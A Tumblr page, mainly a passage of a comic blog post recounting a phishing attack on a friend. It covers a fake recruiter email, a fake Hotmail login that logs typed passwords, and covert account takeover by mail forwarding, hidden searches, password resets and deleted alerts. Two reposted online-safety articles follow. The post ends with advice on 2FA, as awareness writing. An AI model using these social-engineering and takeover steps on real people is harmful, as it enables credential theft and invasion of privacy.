Still nothing.
Well damn
I guess that didn't work. She must have just ignored the email as uninteresting18
I try to think of non-phishing ways to get her password but really phishing is just too good. The nice thing about being the attacker is that you can put your eggs in many baskets. Diana has to defend against all of my eggs, and I've got baskets for days. Time for round 2.
Sniper scope targeted phishing blap blap
I reach under my desk, unwrap a parcel addressed to "DIRECTOR OF CYBER, NSA", slide out a yellow and black canister labelled "CHINA", break open the safety seal, and use safety tongs to extract the following red-hot phish.
This time, instead of using a generic idea that would work on anyone ("suspicious account activity"), we'll make something special just for Diana. Kinda like hand-knitting a beanie, but comparatively less wholesome.
I Google "google docs microsoft equivalent" and come across I dunno SkyDrive or SkyDocs 365 Pro or something or OneDrive look I dunno just look it's Google Docs but Microsoft so good enough for me.
I make a convincing looking resume (in Google Docs, of course) and copy it into a OneSkyCloudDrive 364/2 Days: Final Remix HD+ Doc.
Let's play: who's gonna send this doc to Diana?
I find a local company that's likely to legitimately want to talk to Diana, and search for a recruiter who works there on LinkedIn. I make someone with the same first name, but a different last name as a real recruiter from this company19.
I make a fake gmail account called Kathleen Wheeler, using a stock photo of a middle-aged western woman as the profile photo.
Here's what Kathleen is going to email Diana.
Looks legit riiiight?
The questions at the end are just some garbage I made up, but the point of them is to distract Diana right after she reads the "click here".
I put Diana's real phone number at the end to make it more convincing. This email is obviously meant just for her. It also makes sense for the phone number to be there, since presumably whoever listed Diana as a referee gave the phone number to Kathleen.
At the time she types her password, we want Diana to be thinking of what's on the other side of the login screen.
The delicious bait here is that this email says "someone said they know you", and you have to read the resume to find out who. Aw, but the resume is behind a pesky link. ~Guess you better just click on it~. LinkedIn also does this in their, um, "engagement" emails which say things like "you have 2 new messages", but not who they're from or what they say.
When Diana clicks on the link to the "resume", it will take her to the same fake login page (with her email pre-filled) as before. When she types anything in the password box, the site will wait one second and then send her to the Microsoft Google Doc™. The one-second wait is to simulate Australian internet speeds HAHAHAHAhahahahahah this sucks
She'll find that she doesn't know the person, probably because they're completely made up. They have work experience at real workplaces nearby, and went to the same university as Diana at around the same time, so hopefully their resume passes a cursory glance20.
Finding an unfamiliar resume is a sufficient, but not particularly satisfying conclusion to the adventure of the weird email from Kathleen. But of course, by then it's too late, I'm sitting in my ivory tower surrounded by passwords.
I make sure to send it during business hours, from "Kathleen""", pull a necklace from under my shirt dramatically, kiss it, look up at the sky, and wait.
Waiting
That night, I check my website's logs for any passwords from my fake Hotmail login form.
- - [[date]:16:32:30 +1000] "GET /DIANA?qwerty1 HTTP/1.1" 404 4702 "https://login-live.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=http...." "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1"
"Got it!"
..... is what I think, at first.
Particularly keen readers will have noticed that the password Diana has typed into my fake Hotmail login page is... the same password as we found for her in the Tumblr database.
This is not her Hotmail password, and everything is terrible.
From this we can draw two conclusions:
Diana doesn't know what her Hotmail password is
She now thinks her hotmail password is qwerty1, since she typed it into my fake login page which accepts any password, and it worked
I almost gave up at this point, but a last-minute burst of desperation/frustration/final destination helped me work up the courage to have another shot here in Act 3.
By this point my fake Microsoft Account Team email account has been soft-banned by the good people at William Gates Inc. for sending so many obvious phishing emails. I have to prove I'm a human and add my phone number to the account, and then it unlocks and I can edit the Microsoft Google Doc.
I hastily make a new fake resume of significantly lower quality than the first one, and make a crucial change to my fake login page.
My fake login page now says "wrong password" no matter what you type in the first two times you try typing something. If you type qwerty1, then the password counter doesn't go up21.
What do people do when they get a "wrong password" error? Try all of the 3 or 4 passwords they use for everything, of course.
I want to try and get Diana to type qwerty1, get a "wrong password" error, and then just unload all her passwords into my form.
Diana replied to my failed email with "sorry I don't know this person", and so Kathleen replies with, "wrong resume lol, here's the new one" even though this makes zero sense in the context of our email exchange. I'm hoping Diana will just be busily checking the email on her phone and not really notice this discrepancy.
I use a different font from the "form" when typing as Kathleen to make it look like this is a form that gets copy/pasted to every candidate. This makes Kathleen seem like she does this all the time in her big bustling, 100% real office. I also do my best to imitate the tone of a polite but stressed out office worker. You can almost hear the office politics. It's called method acting.
Time to stressfully wait for Diana to check for her email again, so now would be a good time to read out some donations.
Hours later
It works.
108.162.249.169 - - [12/May/2017:13:39:43 +1000] "GET /DIANA?wertyu2 HTTP/1.1" 404 4702 "https://docs-login-live.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=https%3A%2F%2Faccounts.live.com%2FManageAccount&flowName=GlifWebSignIn&flowEntry=ServiceLogin" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1"
I get only one password from Diana (typed multiple times), but it's different to the last one I got (qwerty1)22.
I wait until she's asleep based on her Facebook Messenger last active time and log into her email using the elite hacking method of typing her password into the box.
The reason I waited until she was asleep was in case Hotmail emailed the account saying "New Sign In". It doesn't, and I'm rewarded with her email inbox screen in its full glory.
Angels sing softly above me. A small yellow bird lands on my shoulder and begins to chirp softly. I get several emails from the bullies in high school - they're really sorry and they've done a lot of soul searching and they want to make it up to me and I should expect premium fruit baskets on my doorstep in the coming months. Global warming halts.
"But that would never work on me"
It would tho.
Perhaps some of you in the audience are thinking "Wow, this Diana person must be pretty dumb to fall for that. Good thing I'm a web browsing prodigy with a colossal brain and many opinions, so that would never happen to me."
The thing is, right now you're very alert, because you're reading a blog post about hacking. If you were just reading your email, half-paying-attention on a train as normal, security wouldn't likely be on your mind. If sending trick emails is good enough for whoever the NSA, are emailing, then it's probably good enough to work on you and me.
I guess what I'm saying here is "don't go shaming phishing victims plz".
Anyway sorry back to haͅck͐i̥n̏g̜
Part 4: HACKER VOICE I'M IN
I immediately try Diana's email password (wertyu2) on her Facebook, Twitter, LinkedIn, iCloud, and on her other email addresses. None of them work because I've chosen someone with slightly above average personal security to target.
The obvious next step is to forward all her email to me (so I don't have to keep logging in to her email). Before I set up email forwarding, I try it out on a hotmail account I control. I'm testing to see if setting up "forward all your email to this address" sets off any notifications I'll have to delete, or notifies you in any other way.
In gmail, when you forward all your mail to another email address, the other address gets emailed a code, and also a big red bar appears on your gmail inbox saying "you're sending literally all of your email to this address FYI" for 7 days.
I type in my email address into my test hotmail account, and click "forward all my mail here pls". It saves. I check both email inboxes for a notification email. There isn't one. I've just backdoored this email account and no fuss has been made whatsoever. OH well at least hotmail has NoMansSkyDrive 2.8 Remastered XL Online or whatever.
An interlude from Diana
Diana replies to my email saying she doesn't know this person either. She's a little suspicious, so I try and say something that will close the conversation.
Diana doesn't reply.
Hey remember how you can search email?
Now that I have Diana's email password, I want to search her email for more passwords, and use those passwords to get more, and so on, like a REAL hacker.
Try going to your email and searching for "password". Betcha there's passwords in there.
In Hotmail, when you go to search something, the last 5 searches you've done pop up as suggestions.
This means that if I search for "password", Diana will notice "password" in the search history. That would be a really lame way to get caught.
To get around this, I: * Wait until Diana is asleep * Write down her last 5 searches * Search for "password" * Look at the results * Search for her last 5 searches again, in reverse order
Since only the last 5 searches are shown, by repeating the searches in reverse order, the search history looks exactly the same.
Much to the disappointment of the live studio audience, I don't find anything particularly useful. I find the two passwords I already know (qwerty1 and wertyu2) several times, and one other password which I again try on all her accounts, but doesn't work </3.
I hang out in Diana's email for several months. Every so often I check it. I find her signing a contract for a job, and so I get her passport number, signature, phone number, bank account number, and basically everything I'd need to impersonate her. I don't really232425 want to impersonate someone's government-issued ID, so I leave this alone.
At one stage, I'm browsing through hit political discourse platform and opinion conveyor belt twitter dot com, and I notice Diana tweet something along the lines of "Finally spent my day off consolidating my 4 email accounts into 1, feels good to be organised".
I panic a little. Have I been found out? I log in to [email protected] (which still works, thankfully) and see that all her emails have been archived. I poke around in the email forwarding settings, and I see that things have changed. Her email is no longer being sent to my email address, it's being sent to [email protected] (presumably the new email that Diana now forwards all her mail to).
This raises an important question. How did Diana not notice my email address in the "forward all mail to:" box? Did she see it, and just mindlessly delete it?
(When I interview her after all this, she says yes, that's exactly what she did.)
What now?
Normally it would end here. Mission accomplished. I'm in control of her email. I could cause catastrophic damage to Diana's life if I wanted to (I don't btw). There's potential for endless gags, limitless goofs, unlimited japes, infinte jests, etc.
But.. it seems like an awful shame to just... leave. That's why I start work on a little' somethin' called
Operation Luigi
Everybody just LOVES Mario's green friend Luigi! He's a Certified Good Boy! Just look at that boyish charm.
Why not brighten up YOUR social media presence with this game boy?
Well gee I'm sold after that delightful interlude from our sponsor, The Nintendo. Let's get Diana some uncut, Colombian Luigi.
Step 1: Get in to her Twitter and LinkedIn
So, I want to:
Get access to Diana's Twitter
Not lock Diana out
Not alert Diana that I'm up in her stuff
I could just phish her again for these passwords, but I'm already a salty old fisherman by this point.
Since I have access to her email, I could reset her Twitter password. The problem is, when you reset your Twitter password, you get logged out of Twitter in Chrome, the Twitter app, and anywhere else you might be logged in. So you have to retype your new password. One of my rules was that I wouldn't interrupt Diana's life, so I need her to be able to log back in to Twitter when I force her to log out.
I come up with a simple 8-step plan to do this, with 4 easy repayments of 2 steps.
Wait until Diana is asleep
Disable Diana's email forwarding
Go to Twitter and reset her password
Click the password reset link that gets emailed to her
Set her password to qwerty1
Delete the password reset email
Delete the "New Twitter Sign In" email
Re-enable email forwarding
The combo move in this is setting her password to qwerty1. When I phished her email password, she tried to log in to her email with qwerty1 even though that's not her password. This tells me that she thinks her password for everything is qwerty1, or at least, that's what she'll try if she's not sure. The technical term for this is next-level mindgames💻💻💻.
I do the steps above, and I'm now logged in to Diana's Twitter account. I tigheten up her Twitter security settings because I'm a Good Boy. I HOPE that Diana will be able to log back in as well, and not wonder why she suddenly got logged out. I wait stressfully for her to tweet something, and after a day or so she retweets a cute doggo, so we're good to go.
Now I want to do the same thing on popular dating website LinkedIn. This will involve signing Diana out of LinkedIn on all her devices, and I don't want her to get too suspicious, so I wait a week. I do the same process as with Twitter. This time I don't even wait until Diana is asleep, because I'm young and invincible.
As I'm setting Diana's password on LinkedIn back to qwerty1, LinkedIn doesn't let me.
Is this because qwerty1 was a password present in the LinkedIn hack in 2012? Or because it's just a common password? For a brief moment I panic, but then I realise I can just set Diana's password to her email password, wertyu2.
Astute readers will have noticed this little guy in the screenshot above.
LinkedIn is asking me if I'd like to log out of Diana's LinkedIn account on all devices while I'm resetting the password. That's REAL nice of you to offer old mate LinkedIn but I'm absolutely golden as it is in terms of logouts so don't even worry about it I'll be just fine how it is NO REALLY don't trouble yourself, I'm sure your CPU cycles are busy displaying everyone's 6000 word Thinkpieces about "Cyber" for "Non-technical Business Decision Makers".
Yeah so I submit that form 100% checkbox-free, and Diana remains logged in to LinkedIn on all her devices, none the wiser.
Step 2: Bring in the green boys
I enlist the help of a talented friend to photoshop everyone's #1 boy next door Luigi subtly into Diana's profile picture on Twitter, like a green guardian angel.
I can't show you Diana's pictures, so here's me doing similar photoshops to Your Boy And Mine, Five Time Celebrity MasterChef Winner And The Inventor of Bitcoin, Give It Up For Dr. Barack Obama Everybody:
At about this time I tweet about our sweet green boy so that if Diana sees her guardian angel Luigi, she'll know it was me. This is like my calling card except.... well it's not really like a calling card it's pretty dorky to be honest but just LOOK at that wholesome lad, you just KNOW he'd help you fix a flat tyre, and he'd just be too gosh darn polite to correct you if you said "thanks green mario" so really if you think about it I guess it IS like a calling card.
Next up I log into her LinkedIn account, get overwhelmed by her 15 LinkedIn notifications, 7 new profile views, 11 new Key People To Bother, and several pop ups telling me about new features I can use to invite people to join my professional network on LinkedIn™®©. Then I change her profile picture to my really good version.
For about a week, Diana continues her Twitter and LinkedIn(?) usage whilst being silently Luigi'd. Diana goes on viewing what I can only assume to be the sharpest international political discourse on Twitter, and getting slightly more LinkedIn profile views from observant recruiters who are also fans of the hit 2001 ghostbusting game, Luigi's Mansion.
Well that just about wraps up Operation Luigi. Glad that's all done and dusted.
Although...
I'm basically a Luigi technician at this point, and it would be a shame to let all that work go to waste. So let's just do
~one more thing~
Operation Waluigi: A dark turn for mature audiences
Waluigi, true to his character, is much more direct.
Damn RIGHT this new profile strength is "Advanced."
Please enjoy these half-baked opsec-enabled26 tweets27.
I also make Diana follow a bunch of Waluigi fan accounts (there are a lot), Nintendo of America, and @EmojiAquarium because it's a damn good account.
Part 5: Epilogue
Diana likes her new Waluigi life so much she keeps it all up there, and even changes her Facebook photo to a Waluigi'd one.
I meet up with her and ask her about her side of the story a few days later.
Here are some choice quotes:
"I've since listened to a lot of Waluigi songs" "Waluigi is the ultimate symbol of postmodernism, he exists only as a foil"
I ask her "How do you think I did it?". She says I must have hacked her email and reset her Twitter password, but she has no idea how I hacked her email.
When I show her the email chain with Kathleen on my computer her jaw drops for several seconds.
"You catfished me!"
We go back to the same ramen place after the interview. The credits roll.
"wait but i am very afraid after reading this blog post, how do I not get 360 noscope hacked like diana tho"
Hey kids, it's me, "Alex". We've had a lot of fun today, but now it's time to talk about the real issues. The moral of this story is that it's really easy for someone else to know your password. Fret not, for you are young and extremely online, and it's not too late for you yet.
Step 1: Go to https://haveibeenpwned.com and type in your email address. This doesn't actually do anything, it's just to instill sufficient fear in you.
Step 228: Go to your email and enable "Two-step Authentication". You can go to https://www.google.com.au/landing/2step if you use gmail. If you use Hotmail then I dunno, there's probably like a SkyCloud 360 X LIVE subscription you can buy that lets you do it.
Now, as well as your email password, you also type in a code from an app on your phone. Or you can have the code SMSed to you on your pastel-pink flip phone if you wanna relive the 90s29.
If Diana had Verified Good Content Two-step Authentication turned on, then I would have had to get a two-factor code AND her password. I would have had to either:
Phish the code as well as the password (but the code expires in less than 60 seconds)
Physically go to the same place as her, connect to the same WiFi, and steal her browser session
Email her a Word Doc with a macro in it that gives me control of her laptop, and steal her browser cookies from it
Call up her phone provider and trick them into pointing her phone number at my SIM card
All of these are more work and higher risk, and so hackers often just move on to lower hanging fruit. That's you in this situation. You're the delicious fruit. And the hackers are.... giraffes? Yeah. Watch out for giraffes.
Freshly baked shoutouts to My Absolute Homeslices for being my blog-review senpais, Diana for being chill, and to the hacking software released at DEFCON 25: Aerobatic dot io
If you want to talk to me about this, hit me up in the tweet zone (@mangopdf) or direct your browser to mango.pdf.zone
A careless mistake ↩︎
Obviously the best way is to not give permission to meeeeeeeee😎 ↩︎
I found her LinkedIn by just googling her name #pwned ↩︎
wait did he just say "hacker voice I'm in"? ↩︎
I haven't realised yet that successfully resetting Diana's iCloud password would lock her out of her account and violate our agreement. This is because I'm a weapons-grade bozo. ↩︎
On haveibeenpwned.com, Diana's email address shows up in a data dump from this website. It's a game of some sort? ↩︎
Later when I interview Diana, she says "I use exclusively Google Docs", so I was right! No comment about the avocado thing. ↩︎
I'm not making these up, these are real words that real hackers use I swear. ↩︎
Diana didn't have LinkedIn in 2012, so she's not in the list. But some of the 20 people who had the same password as her sure did. ↩︎
tag urself lol ↩︎
I also try guessing what her password could be based on the password I already have for her (qwerty1) but it doesn't work. ↩︎
low ↩︎
effort ↩︎
From 2002 do NOT @ me ↩︎
This makes no sense, since she'll be reading her Hotmail, and then asked to log in to the same thing she's already reading, but NON-fake websites have bad enough UX that this is believable. ↩︎
I steal all that good stuff after the URL from the Google sign-in page ;>_> ↩︎
Awkwardly, Hotmail changed its login screen shortly before this blog post came out. It used to look like that I swear. ↩︎
There are a few reasons this email wasn't attention grabbing. It was automated, from a company (not an actual human), and wasn't specifically about her, but about her account. ↩︎
When I interview her later, Diana says she looked up the company! She even says that getting back to Kathleen was on her to-do list, the poor thing. ↩︎
Months later, I notice I've left a "Lorem ipsum dolor sit amet, consectetur adipiscing elit" as a dot point on the resume. ↩︎
This is a genius suggestion from one of my ~hacker connections~. ↩︎
At this point Diana has been completely gaslighted as to what her hotmail password is, because my phishing site said the wrong password was right, and then said the right password was wrong, and she thinks it's the real Hotmail. ↩︎
I mean it WOULD be pretty funny ↩︎
And wow you could do anything, book flights, get a job, change your name... ↩︎
Just letting any Government Agents reading this know that I did NOT end up doing anything with this and I love democracy. ↩︎
If you really tried you could probably find Diana's Twitter from these. You would then be a hacking genius, binary flowing through your veins, and have a CVE number assigned to your personally. I, a humble wannabee, am relying on your strict ethics to prevent you from, uh, stalking the friend of some guy whose blog post you read. You can do it. I believe in you. ↩︎
Having said that, I don't really have an overwhelming amount of faith in the idea that someone won't try to do that. You can stay chilled out, dear reader, since before this blog was published Diana and I had a nice chat and fixed up her personal security. ↩︎
Password managers like LastPass are also good for giving you unique passwords, but I reckon 2FA is the best effort:security ratio value For Normal People Tee Em. ↩︎
But, this is less secure, since your phone number can still be hijacked. ↩︎
386 notes · View notes
thomasalwyndavis · 5 years ago
Text
Being on the Safe Side of Being Online
Oh, the world wide web, how fascinating our lives have been with it! It has opened is to a whole new dimension of information we have no access to before. But then, just like any other place that’s worth exploring, there may be dangers that lurk on the sides that if you fall victim to, will damage your entire experience. So, you need to be aware of these hazards and keep yourself safe when surfing online. What’s great is that you don’t really need to be a computer science genius to know how to amply protect yourself when exploring the internet. Minimize your risk by taking note of these tips to enjoy a safer web experience.
The Importance of Upgrading
Let’s admit it: Most, if not all of us, get annoyed when programs in our computer get upgraded without our permission. These silent upgrades are not done for no reason, though, as they play a key role in keeping everyone safe. Moreover, browsers and OSes have made it point to roll out their updates in a seamless fashion, making it a point to not bother users. It would be best to apply these updates on all applications and programs, not just on your browser or frequently used programs. Don’t allow old versions of programs to be left in your machine, as they are susceptible to attacks, not to mention that they may soon (or may have already) be without support.
Silent upgrades might occasionally be annoying (and costly), but they’re a big part of keeping you safe, which is why the updates for most OSes and browsers now happen seamlessly. Apply updates whenever you’re asked to on all your applications, not just your browser, and be wary of leaving older hardware gathering dust on your network.
Viruses and malware are constantly evolving to exploit vulnerabilities in your software and hardware. Software developers try to fix these flaws as soon as they are discovered. What many people don’t realise is that infections occur because people delay software updates that fix these flaws. In short, they could have protected themselves by installing the updates to fix the security holes as soon as they came out.
(Via: https://www.necl-it.co.uk/2019/03/08/the-importance-of-keeping-software-up-to-date/)
That Required Two-Step Verification
Users are pretty much exposed to two-step verification, with most tech firms giving users the option to set it up on their accounts. What it is, basically, is that users can have an SMS or code to supplement their usernames and passwords every time they log in on a new device. Google and Microsoft highly encourage two-step verification, while for Mac users, they call it 2FA, or 2 Factor Authentication. There’s a slight difference in the process but the overall idea is the same.
Two-factor authentication (usually abbreviated 2FA) is a way to prove that you actually are the owner of a particular account by providing two “factors” of evidence. One factor is a piece of knowledge—your password or PIN, for instance. Another factor may be possession of a particular object—a phone that receives texts sent to a certain number, a USB key fob, or access to an email address. A another factor may be inheritance—something inherent to you, like your fingerprint or a retinal scan.
(Via: https://www.macworld.com/article/3520993/getting-started-with-2fa-secure-your-accounts-now-or-regret-it-later.html)
Is It Time for End-to-End Encryption?
End-to-end encryption is supposed to be a heaven-sent for users who want to be guaranteed privacy, as the encrypted messages they send can be read by only both receiver and sender, which means snoopers and hackers are excluded. URLs starting HTTPS and platforms that use fully encrypted messaging such as Signal and WhatsApp are enablers of end-to-end encryption. However, recent developments have revealed that it seems that government agencies have encouraged firms to abandon end-to-end encryption.
But though Apple at one time may have had plans to offer end-to-end encryption, according to a new report from Reuters the iPhone manufacturer abandoned plans to do so after receiving complaints from the FBI.
(Via: https://www.mic.com/p/apple-dropped-end-to-end-encryption-plans-for-icloud-to-appease-the-fbi-says-new-report-21734265)
Lock Your Phone for Real
If your phone doesn’t have a lock screen, you are exposing yourself to a lot of danger, as cybercriminals can get to your web browser history and social media accounts, both of which contain your most personal information. You may opt to add a fingerprint, a PIN code, or a pattern, which makes sure that unwelcome visitors or snatchers of your phone are discouraged from stealing your information.
With a little work, your Galaxy, Pixel, or OnePlus phone can be a veritable fortress, virtually impenetrable to hacks, attacks, and bad apps. So whether you’re looking for a little extra security or a complete lockdown of your phone, here’s everything you need to keep your data from falling into the wrong hands.
(Via: https://www.pcworld.com/article/3332211/secure-android-phone.html)
Don’t Rely on Public Wi-Fi
When you access public Wi-Fi, take note that a lot of other users can, too. This means that you will have to be careful of what you are sharing, what websites you go to, as other people may see it. You may consider installing VPN software if you’re fond of connecting to public Wi-Fi. But then, even of institutions like EFF say that public Wi-Fi isn’t that dangerous anymore, you should take this with a grain of salt.
However, starting in 2010 that all changed. Eric Butler released Firesheep, an easy-to-use demonstration of “sniffing” insecure HTTP to take over people’s accounts. Site owners started to take note and realized they needed to implement HTTPS (the more secure, encrypted version of HTTP) for every page on their site. The timing was good: earlier that year, Google had turned on HTTPS by default for all Gmail users and reported that the costs to do so were quite low. Hardware and software had advanced to the point where encrypting web browsing was easy and cheap.
(Via: https://www.eff.org/deeplinks/2020/01/why-public-wi-fi-lot-safer-you-think/)
But then, no matter what safety precautions you can adapt to make your web experience safer and more private, incidences like hacking may still occur, causing data loss. But don’t worry – we have you covered. Click here to know how we can help you recover your files.
Being on the Safe Side of Being Online was first published on Hard Drive Recovery Associates
from Hard Drive Recovery Associates - Feed at https://www.harddrivefailurerecovery.net/being-on-the-safe-side-of-being-online/
Being on the Safe Side of Being Online Find more on: ThomasAlwynDavis
from Thomas Alwyn Davis - Feed https://thomasalwyndavis.com/2020/03/27/being-on-the-safe-side-of-being-online/
0 notes
simplypsd1 · 5 years ago
Text
Being on the Safe Side of Being Online
Oh, the world wide web, how fascinating our lives have been with it! It has opened is to a whole new dimension of information we have no access to before. But then, just like any other place that’s worth exploring, there may be dangers that lurk on the sides that if you fall victim to, will damage your entire experience. So, you need to be aware of these hazards and keep yourself safe when surfing online. What’s great is that you don’t really need to be a computer science genius to know how to amply protect yourself when exploring the internet. Minimize your risk by taking note of these tips to enjoy a safer web experience.
The Importance of Upgrading
Let’s admit it: Most, if not all of us, get annoyed when programs in our computer get upgraded without our permission. These silent upgrades are not done for no reason, though, as they play a key role in keeping everyone safe. Moreover, browsers and OSes have made it point to roll out their updates in a seamless fashion, making it a point to not bother users. It would be best to apply these updates on all applications and programs, not just on your browser or frequently used programs. Don’t allow old versions of programs to be left in your machine, as they are susceptible to attacks, not to mention that they may soon (or may have already) be without support.
Silent upgrades might occasionally be annoying (and costly), but they’re a big part of keeping you safe, which is why the updates for most OSes and browsers now happen seamlessly. Apply updates whenever you’re asked to on all your applications, not just your browser, and be wary of leaving older hardware gathering dust on your network.
Viruses and malware are constantly evolving to exploit vulnerabilities in your software and hardware. Software developers try to fix these flaws as soon as they are discovered. What many people don’t realise is that infections occur because people delay software updates that fix these flaws. In short, they could have protected themselves by installing the updates to fix the security holes as soon as they came out.
(Via: https://www.necl-it.co.uk/2019/03/08/the-importance-of-keeping-software-up-to-date/)
That Required Two-Step Verification
Users are pretty much exposed to two-step verification, with most tech firms giving users the option to set it up on their accounts. What it is, basically, is that users can have an SMS or code to supplement their usernames and passwords every time they log in on a new device. Google and Microsoft highly encourage two-step verification, while for Mac users, they call it 2FA, or 2 Factor Authentication. There’s a slight difference in the process but the overall idea is the same.
Two-factor authentication (usually abbreviated 2FA) is a way to prove that you actually are the owner of a particular account by providing two “factors” of evidence. One factor is a piece of knowledge—your password or PIN, for instance. Another factor may be possession of a particular object—a phone that receives texts sent to a certain number, a USB key fob, or access to an email address. A another factor may be inheritance—something inherent to you, like your fingerprint or a retinal scan.
(Via: https://www.macworld.com/article/3520993/getting-started-with-2fa-secure-your-accounts-now-or-regret-it-later.html)
Is It Time for End-to-End Encryption?
End-to-end encryption is supposed to be a heaven-sent for users who want to be guaranteed privacy, as the encrypted messages they send can be read by only both receiver and sender, which means snoopers and hackers are excluded. URLs starting HTTPS and platforms that use fully encrypted messaging such as Signal and WhatsApp are enablers of end-to-end encryption. However, recent developments have revealed that it seems that government agencies have encouraged firms to abandon end-to-end encryption.
But though Apple at one time may have had plans to offer end-to-end encryption, according to a new report from Reuters the iPhone manufacturer abandoned plans to do so after receiving complaints from the FBI.
(Via: https://www.mic.com/p/apple-dropped-end-to-end-encryption-plans-for-icloud-to-appease-the-fbi-says-new-report-21734265)
Lock Your Phone for Real
If your phone doesn’t have a lock screen, you are exposing yourself to a lot of danger, as cybercriminals can get to your web browser history and social media accounts, both of which contain your most personal information. You may opt to add a fingerprint, a PIN code, or a pattern, which makes sure that unwelcome visitors or snatchers of your phone are discouraged from stealing your information.
With a little work, your Galaxy, Pixel, or OnePlus phone can be a veritable fortress, virtually impenetrable to hacks, attacks, and bad apps. So whether you’re looking for a little extra security or a complete lockdown of your phone, here’s everything you need to keep your data from falling into the wrong hands.
(Via: https://www.pcworld.com/article/3332211/secure-android-phone.html)
Don’t Rely on Public Wi-Fi
When you access public Wi-Fi, take note that a lot of other users can, too. This means that you will have to be careful of what you are sharing, what websites you go to, as other people may see it. You may consider installing VPN software if you’re fond of connecting to public Wi-Fi. But then, even of institutions like EFF say that public Wi-Fi isn’t that dangerous anymore, you should take this with a grain of salt.
However, starting in 2010 that all changed. Eric Butler released Firesheep, an easy-to-use demonstration of “sniffing” insecure HTTP to take over people’s accounts. Site owners started to take note and realized they needed to implement HTTPS (the more secure, encrypted version of HTTP) for every page on their site. The timing was good: earlier that year, Google had turned on HTTPS by default for all Gmail users and reported that the costs to do so were quite low. Hardware and software had advanced to the point where encrypting web browsing was easy and cheap.
(Via: https://www.eff.org/deeplinks/2020/01/why-public-wi-fi-lot-safer-you-think/)
But then, no matter what safety precautions you can adapt to make your web experience safer and more private, incidences like hacking may still occur, causing data loss. But don’t worry – we have you covered. Click here to know how we can help you recover your files.
Being on the Safe Side of Being Online was first published on Hard Drive Recovery Associates
from Hard Drive Recovery Associates - Feed
Being on the Safe Side of Being Online was originally seen on SimplyPSD.com Blog
from https://www.simplypsd.com/2020/03/being-on-the-safe-side-of-being-online/
0 notes
knowledgeboxs · 5 years ago
Photo
Tumblr media
We are here to help you . We are providing technical and professional information . 
for more click here :- Knowledge Box
1 note · View note